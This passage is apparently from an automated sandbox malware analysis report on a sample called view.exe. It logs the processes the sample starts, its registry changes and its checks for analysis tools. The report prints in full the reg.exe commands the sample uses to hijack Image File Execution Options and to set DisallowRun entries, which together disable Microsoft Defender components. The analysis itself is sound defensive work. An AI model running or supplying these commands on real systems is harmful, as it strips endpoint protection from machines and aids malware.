                        Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe Defender9Jump to behavior
                        Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe Defender10Jump to behavior
                        Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OfflineScannerShell.exe Defender11
                        Source: C:\ProgramData\screen.exeCode function: 8_2_0040EE9C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                        Source: C:\Users\user\Desktop\view.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\screen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion:

                        barindex
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: view.exe, 00000000.00000003.236882380.0000000003924000.00000004.00000001.sdmpBinary or memory string: REG.EXE ADD "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AUTORUNS.EXE" /V HUORONG6 /T REG_SZ /D "CMD.EXE" /F
                        Source: view.exe, 00000000.00000003.236882380.0000000003924000.00000004.00000001.sdmpBinary or memory string: REG.EXE ADD "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\DISALLOWRUN"/V HUORONG6 /T REG_SZ /D AUTORUNS.EXE /F
                        Contains functionality to detect sleep reduction / modifications
                        Source: C:\Users\user\Desktop\view.exeCode function: 0_2_004123F0
                        Source: C:\Windows\System32\svchost.exe TID: 4600Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\view.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\unpro.exeJump to dropped file
                        Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 1345
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                        Source: C:\ProgramData\screen.exeAPI coverage: 1.7 %
                        Source: C:\Users\user\Desktop\view.exeCode function: 0_2_004123F0
                        Source: C:\Users\user\Desktop\view.exeCode function: 0_2_00404B24 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                        Source: C:\ProgramData\screen.exeCode function: 8_2_004024C1 FindFirstFileA,FindNextFileA,FindClose,
                        Source: C:\ProgramData\screen.exeCode function: 8_2_004030D0 FindFirstFileA,FindNextFileA,strlen,strlen,
                        Source: C:\Users\user\Desktop\view.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Users\user\Desktop\view.exeAPI call chain: ExitProcess graph end node
                        Source: svchost.exe, 0000000E.00000002.496781983.000001EE23462000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
                        Source: reg.exe, 0000000C.00000002.254885067.0000000003420000.00000002.00000001.sdmp, reg.exe, 0000000D.00000002.257432570.0000000000CF0000.00000002.00000001.sdmp, reg.exe, 0000000F.00000002.259445658.0000000000D40000.00000002.00000001.sdmp, reg.exe, 00000010.00000002.261358871.0000000000FE0000.00000002.00000001.sdmp, reg.exe, 00000011.00000002.262676800.0000000000980000.00000002.00000001.sdmp, reg.exe, 00000012.00000002.264698792.0000000000EE0000.00000002.00000001.sdmp, reg.exe, 00000013.00000002.266958155.0000000000AB0000.00000002.00000001.sdmp, reg.exe, 00000014.00000002.268582449.0000000001080000.00000002.00000001.sdmp, reg.exe, 00000016.00000002.271593040.0000000000CC0000.00000002.00000001.sdmp, reg.exe, 00000018.00000002.273233954.0000000003610000.00000002.00000001.sdmp, reg.exe, 0000001A.00000002.277679589.0000000000EE0000.00000002.00000001.sdmp, reg.exe, 0000001D.00000002.284934541.0000000000DD0000.00000002.00000001.sdmp, svchost.exe, 0000001E.00000002.496057853.000002BC5B940000.00000002.00000001.sdmp, reg.exe, 00000021.00000002.287696505.0000000000FD0000.00000002.00000001.sdmp, reg.exe, 00000023.00000002.289934977.0000000001010000.00000002.00000001.sdmp, reg.exe, 00000027.00000002.294145755.0000000000BF0000.00000002.00000001.sdmp, reg.exe, 00000029.00000002.295903628.0000000000710000.00000002.00000001.sdmp, reg.exe, 0000002A.00000002.299278276.0000000000D40000.00000002.00000001.sdmp, reg.exe, 0000002B.00000002.301476692.0000000000A80000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                        Source: svchost.exe, 0000000E.00000002.493784914.000001EE1DC29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                        Source: svchost.exe, 0000001C.00000002.494109020.000002152A602000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                        Source: reg.exe, 0000000C.00000002.254885067.0000000003420000.00000002.00000001.sdmp, reg.exe, 0000000D.00000002.257432570.0000000000CF0000.00000002.00000001.sdmp, reg.exe, 0000000F.00000002.259445658.0000000000D40000.00000002.00000001.sdmp, reg.exe, 00000010.00000002.261358871.0000000000FE0000.00000002.00000001.sdmp, reg.exe, 00000011.00000002.262676800.0000000000980000.00000002.00000001.sdmp, reg.exe, 00000012.00000002.264698792.0000000000EE0000.00000002.00000001.sdmp, reg.exe, 00000013.00000002.266958155.0000000000AB0000.00000002.00000001.sdmp, reg.exe, 00000014.00000002.268582449.0000000001080000.00000002.00000001.sdmp, reg.exe, 00000016.00000002.271593040.0000000000CC0000.00000002.00000001.sdmp, reg.exe, 00000018.00000002.273233954.0000000003610000.00000002.00000001.sdmp, reg.exe, 0000001A.00000002.277679589.0000000000EE0000.00000002.00000001.sdmp, reg.exe, 0000001D.00000002.284934541.0000000000DD0000.00000002.00000001.sdmp, svchost.exe, 0000001E.00000002.496057853.000002BC5B940000.00000002.00000001.sdmp, reg.exe, 00000021.00000002.287696505.0000000000FD0000.00000002.00000001.sdmp, reg.exe, 00000023.00000002.289934977.0000000001010000.00000002.00000001.sdmp, reg.exe, 00000027.00000002.294145755.0000000000BF0000.00000002.00000001.sdmp, reg.exe, 00000029.00000002.295903628.0000000000710000.00000002.00000001.sdmp, reg.exe, 0000002A.00000002.299278276.0000000000D40000.00000002.00000001.sdmp, reg.exe, 0000002B.00000002.301476692.0000000000A80000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                        Source: reg.exe, 0000000C.00000002.254885067.0000000003420000.00000002.00000001.sdmp, reg.exe, 0000000D.00000002.257432570.0000000000CF0000.00000002.00000001.sdmp, reg.exe, 0000000F.00000002.259445658.0000000000D40000.00000002.00000001.sdmp, reg.exe, 00000010.00000002.261358871.0000000000FE0000.00000002.00000001.sdmp, reg.exe, 00000011.00000002.262676800.0000000000980000.00000002.00000001.sdmp, reg.exe, 00000012.00000002.264698792.0000000000EE0000.00000002.00000001.sdmp, reg.exe, 00000013.00000002.266958155.0000000000AB0000.00000002.00000001.sdmp, reg.exe, 00000014.00000002.268582449.0000000001080000.00000002.00000001.sdmp, reg.exe, 00000016.00000002.271593040.0000000000CC0000.00000002.00000001.sdmp, reg.exe, 00000018.00000002.273233954.0000000003610000.00000002.00000001.sdmp, reg.exe, 0000001A.00000002.277679589.0000000000EE0000.00000002.00000001.sdmp, reg.exe, 0000001D.00000002.284934541.0000000000DD0000.00000002.00000001.sdmp, svchost.exe, 0000001E.00000002.496057853.000002BC5B940000.00000002.00000001.sdmp, reg.exe, 00000021.00000002.287696505.0000000000FD0000.00000002.00000001.sdmp, reg.exe, 00000023.00000002.289934977.0000000001010000.00000002.00000001.sdmp, reg.exe, 00000027.00000002.294145755.0000000000BF0000.00000002.00000001.sdmp, reg.exe, 00000029.00000002.295903628.0000000000710000.00000002.00000001.sdmp, reg.exe, 0000002A.00000002.299278276.0000000000D40000.00000002.00000001.sdmp, reg.exe, 0000002B.00000002.301476692.0000000000A80000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                        Source: svchost.exe, 0000001C.00000002.494215352.000002152A640000.00000004.00000001.sdmp, svchost.exe, 0000001E.00000002.493904726.000002BC5AC3D000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.493695484.000001183C42A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: reg.exe, 0000000C.00000002.254885067.0000000003420000.00000002.00000001.sdmp, reg.exe, 0000000D.00000002.257432570.0000000000CF0000.00000002.00000001.sdmp, reg.exe, 0000000F.00000002.259445658.0000000000D40000.00000002.00000001.sdmp, reg.exe, 00000010.00000002.261358871.0000000000FE0000.00000002.00000001.sdmp, reg.exe, 00000011.00000002.262676800.0000000000980000.00000002.00000001.sdmp, reg.exe, 00000012.00000002.264698792.0000000000EE0000.00000002.00000001.sdmp, reg.exe, 00000013.00000002.266958155.0000000000AB0000.00000002.00000001.sdmp, reg.exe, 00000014.00000002.268582449.0000000001080000.00000002.00000001.sdmp, reg.exe, 00000016.00000002.271593040.0000000000CC0000.00000002.00000001.sdmp, reg.exe, 00000018.00000002.273233954.0000000003610000.00000002.00000001.sdmp, reg.exe, 0000001A.00000002.277679589.0000000000EE0000.00000002.00000001.sdmp, reg.exe, 0000001D.00000002.284934541.0000000000DD0000.00000002.00000001.sdmp, svchost.exe, 0000001E.00000002.496057853.000002BC5B940000.00000002.00000001.sdmp, reg.exe, 00000021.00000002.287696505.0000000000FD0000.00000002.00000001.sdmp, reg.exe, 00000023.00000002.289934977.0000000001010000.00000002.00000001.sdmp, reg.exe, 00000027.00000002.294145755.0000000000BF0000.00000002.00000001.sdmp, reg.exe, 00000029.00000002.295903628.0000000000710000.00000002.00000001.sdmp, reg.exe, 0000002A.00000002.299278276.0000000000D40000.00000002.00000001.sdmp, reg.exe, 0000002B.00000002.301476692.0000000000A80000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                        Source: C:\Users\user\Desktop\view.exeCode function: 0_2_004133BC LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,
                        Source: C:\ProgramData\screen.exeCode function: memset,memset,GetWindowsDirectoryA,strlen,strlen,FindWindowA,GetWindowThreadProcessId,OpenProcess,CloseHandle,CloseHandle,PostMessageA,EnumWindows,memset,memset,MultiByteToWideChar,CloseHandle,memset,FindWindowA,GetWindowThreadProcessId,PostMessageA,memset,CreateProcessA,FreeLibrary, Explorer.exe
                        Source: C:\ProgramData\screen.exeCode function: memset,memset,GetWindowsDirectoryA,strlen,strlen,FindWindowA,GetWindowThreadProcessId,OpenProcess,CloseHandle,CloseHandle,PostMessageA,EnumWindows,memset,memset,MultiByteToWideChar,CloseHandle,memset,FindWindowA,GetWindowThreadProcessId,PostMessageA,memset,CreateProcessA,FreeLibrary, Explorer.exe
                        Source: C:\Users\user\Desktop\view.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\StartPublic.cmd' '
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /n /c yn /t 1 /d y
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\screen.exe 'C:\ProgramData\screen.exe' elevate 'C:\ProgramData\screen.exe' exec hide 'C:\Users\Public\Public.cmd'
                        Source: C:\ProgramData\screen.exeProcess created: C:\ProgramData\screen.exe 'C:\ProgramData\screen.exe' exec hide 'C:\Users\Public\Public.cmd'
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsSense.exe' /v Defender1 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseCncProxy.exe' /v Defender2 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseIR.exe' /v Defender3 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseNdr.exe' /v Defender4 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseSampleUploader.exe' /v Defender5 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseCE.exe' /v Defender6 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe' /v Defender7 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe' /v Defender8 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe' /v Defender9 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe' /v Defender10 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OfflineScannerShell.exe' /v Defender11 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender1 /t REG_SZ /d 'MsSense.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender2 /t REG_SZ /d 'SenseCncProxy.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender3 /t REG_SZ /d 'SenseIR.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender4 /t REG_SZ /d 'SenseNdr.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender5 /t REG_SZ /d 'SenseSampleUploader.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender6 /t REG_SZ /d 'SenseCE.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender7 /t REG_SZ /d 'ConfigSecurityPolicy.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender8 /t REG_SZ /d 'MpCmdRun.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender9 /t REG_SZ /d 'MsMpEng.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender5 /t REG_SZ /d 'SenseSampleUploader.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
